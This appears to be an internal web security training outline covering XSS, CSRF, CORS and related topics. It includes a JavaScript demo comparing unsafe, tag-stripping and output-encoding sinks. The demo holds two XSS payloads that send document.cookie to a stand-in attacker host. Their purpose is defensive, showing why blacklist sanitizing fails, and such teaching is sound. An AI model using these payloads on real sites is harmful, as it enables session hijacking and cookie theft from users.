The Hitchhiker's Guide to Web Security

{:.no_toc}

Table of Contents

{:.no_toc}

  • A markdown unordered list which will be replaced with the ToC, excluding the "Contents header" from above {:toc}

Objective

To understand the most common threats to web application security and what you can do to reduce the risk of your site being hacked.

Recent news

Questions for the audience

  • Anyone who majored in Information Security at school?
  • Anyone who has exploited an XSS vulnerability?
  • Anyone who has installed Kali Linux?
  • Anyone who has rooted an Android device or jailbroken an iOS device?
  • Is there any chance of recovering your Windows log-in password if you forget it?
  • Any experience dealing with security issues/incidents?

Case Study

  • Exploit XSS vulnerability to steal cookies
  • Solution proposal for authorization check in anonymous applications
  • Upload limitation in anonymous applications
  • Sanitizing/Removing the <script> tag: https://sapjira.wdf.sap.corp/browse/KNGMHM02-11871
  • Security Vulnerability auditing reports by third-party auditor

Lynda - Security Training and Tutorials

More than 180 courses

Programming Foundations: Web Security

CompTIA Security+ (SY0-501) Cert Prep: 1 Threats, Attacks, and Vulnerabilities

Ethical Hacking: Website and Web Application Testing (Malcolm Shore)

Overview of web security, including the WebSocket protocol

Penetration Testing Essential Training (Malcolm Shore)

What a pen test is, basic bash scripting, Python, Kali ...

Node.js: Security

React: Securing Applications

Ethical Hacking with JavaScript

DevSecOps: Automated Security Testing

Security Tips Weekly

  • Watch this course
  • Use a password manager
    • Stores passwords for different sites
    • Fills in passwords on websites
    • Stores secure notes
    • Generates strong passwords, etc.
    • Secures all passwords with one master password
    • LastPass, KeePass, 1Password, etc.
    • Most can sync passwords between computers (browser extensions) and devices (Android/iOS apps)

Web Security Guideline

Vulnerability Testing Lab

Penetration Tools

  • Nmap, Netcat, tcpdump, netstat ...
  • Kali Linux
  • Vega Scanner
  • Burp Suite
  • ZAP
  • ...

Certifications on Security / Cybersecurity

UI5 / Fiori Frontend Security

Cross-Site-Scripting (XSS)

XSS - Information

  • How XSS works: attacker-controlled data is written into the page as markup or script instead of as text, so it runs in the victim's origin with the victim's session. As a result, XSS can read `document.cookie` (unless the session cookie is HttpOnly) and hijack the session ID, or simply act as the user without ever reading the cookie
    • DOM-based XSS: no server involved; the payload goes from a client-side source (URL, input field) straight into a DOM sink such as `innerHTML`
    • Manipulated network request: client -> server -> client (reflected or stored payload echoed back by the server)
    • Typical sources: URL params / user input
  • Solution
    • Output encoding: render untrusted data as a string in the context where it lands (HTML text, attribute, JavaScript), never as markup or JavaScript code
    • Input validation (an allow-list of what the field may contain; a blacklist such as removing `<script>` tags is bypassable)
    • Secure libraries whose controls encode bound values by default
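The vulnerable rendering beside its hardened form, as an added example that is not part of the original page and not UI5 or any SAP code. It assumes a hypothetical greeting page that reads `name` from the URL query string and writes it into the document with `innerHTML`; the attacker payloads, the `https://attacker.example` collector URL, the `app.example` host and the `wouldExecute` check (a crude regex stand-in for what a browser would parse and execute, not a real HTML parser) are constructed for illustration. It also goes one step beyond the list above, covering the "Sanitizing/Removing the `<script>` tag" case study: an event-handler attribute executes without any `<script>` tag, so tag stripping leaves it live, whereas output encoding neutralizes both payloads.

```javascript
// Added example (not code from the original page): a DOM-based XSS source,
// three ways of writing it into the page, and a check for whether the
// resulting markup still carries executable content.  Runs under Node.

// Source: a query parameter read on the client (DOM-based XSS, no server
// involved).  Hypothetical page URL, constructed for the demo.
function nameFromUrl(href) {
  return new URL(href).searchParams.get('name') || '';
}

// Output encoding for the HTML text/attribute context: the data can no longer
// open a tag or break out of a quoted attribute value.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Blacklist approach from the case study: drop <script ...> and </script> only.
function stripScriptTags(untrusted) {
  return String(untrusted).replace(/<\/?script\b[^>]*>/gi, '');
}

// Three sinks.  In the real page each result would be assigned to innerHTML.
function renderUnsafe(name)    { return `<p>Hello, ${name}</p>`; }
function renderStripOnly(name) { return `<p>Hello, ${stripScriptTags(name)}</p>`; }
function renderEncoded(name)   { return `<p>Hello, ${escapeHtml(name)}</p>`; }

// Crude stand-in for the browser's parser (assumption: a heuristic, not a
// real HTML parser): does the markup still contain a <script> tag or an
// inline event-handler attribute (onerror=, onload=, ...) inside a tag?
function wouldExecute(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed attacker payloads.  The first is the cookie-theft case study:
// it ships document.cookie to an attacker-controlled collector (only readable
// if the session cookie lacks the HttpOnly flag).  The second contains no
// <script> tag at all, so tag stripping leaves it intact.
const COOKIE_THEFT = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>";
const NO_SCRIPT_TAG = '<img src=x onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">';

// Run every sink against every payload; returns { payloadName: { sinkName: bool } }.
function compare(payloads = { COOKIE_THEFT, NO_SCRIPT_TAG }) {
  const sinks = { renderUnsafe, renderStripOnly, renderEncoded };
  const result = {};
  for (const [pname, payload] of Object.entries(payloads)) {
    result[pname] = {};
    for (const [sname, sink] of Object.entries(sinks)) {
      result[pname][sname] = wouldExecute(sink(payload));
    }
  }
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  // A victim lured to the page with the payload in the URL (constructed link).
  const victimUrl = 'https://app.example/greet?name=' + encodeURIComponent(COOKIE_THEFT);
  console.log('name taken from URL:', nameFromUrl(victimUrl));
  console.table(compare());
}
```

`compare()` reports `true` for both payloads through `renderUnsafe`, `true` for the `onerror` payload through `renderStripOnly` (the blacklist misses it), and `false` for everything through `renderEncoded`. In a real UI5 or plain-DOM page the equivalent of `renderEncoded` is writing the value with `textContent` or a data binding that encodes by default, rather than concatenating it into `innerHTML`.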

XSS - UI5 Control Protection

Click-Jacking

URL Handling

MIME-Type Sniffing

Client Storage

Cross-Site-Request-Forgery (CSRF)

Cross-Origin Resource Sharing (CORS)

References

Books or Web Pages

SAP Related